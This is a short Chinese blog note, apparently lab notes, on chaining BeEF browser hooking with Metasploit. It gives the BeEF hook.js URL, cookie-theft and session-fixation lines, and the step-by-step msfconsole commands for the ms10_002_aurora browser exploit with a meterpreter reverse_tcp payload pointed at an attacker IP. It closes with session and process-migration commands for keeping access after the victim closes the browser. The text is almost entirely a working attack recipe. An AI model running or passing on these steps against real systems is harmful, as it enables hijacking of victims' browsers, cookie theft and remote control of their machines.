利用beef和msf实现session远程命令

笔记

    • beef
      • 启动 beef 的方法
    • msf

beef

工具目录 /usr/share/beef-xss
配置文件 config.yaml

启动 beef 的方法

1.beef-xss
2./usr/share/beef-xss/beef
(使用前需要修改默认的用户名称和密码)
Web 管理界面 http://127.0.0.1:3000/ui/panel
Shellcode http://127.0.0.1:3000/hook.js
测试页面 http://127.0.0.1:3000/demos/butcher/index.html
#xss 利用 1.浏览器劫持
2.Cookie 窃取与欺骗–固定会话攻击
data:cookie=“username=admin”; userid=1


document.cookie=“username=admin”;
document.cookie=“userid=1”;


msf

1.—启动 msfcosole
2.—用模块 use exploit/windows/browser/ms10_002_aurora
3.—set payload windows/meterpreter/reverse_tcp
4.—set SRVHOST 192.168.36.128(攻击者)
5.—show options
6.—set LHOST 192.168.36.128(攻击者)
7.—启动模块 exploit 得到一个 URL,让浏览器重定向到改 URL
8.—至此建立一个 session
sessions -i 查看会话
seessions -i 1 切换会话
ps 查看当前会话
getpid 查看当前 pid
getuid 查看当前 uid
migrate 1420 切换进程到 1420(切换进程是为了使得被攻击者不会因为关闭浏览器而下线)

你可能感兴趣的:(杂记,1024程序员节)